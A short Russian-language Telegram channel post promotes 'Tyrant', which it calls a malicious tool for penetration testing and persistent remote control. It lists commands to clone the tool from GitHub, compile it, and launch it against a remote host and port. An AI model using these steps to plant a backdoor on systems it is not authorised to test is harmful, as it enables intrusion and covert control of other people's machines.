🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.
git clone https://github.com/MartinxMax/Tyrant.git
cd Tyrant/
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]
#web
Please open Telegram to view this post
VIEW IN TELEGRAM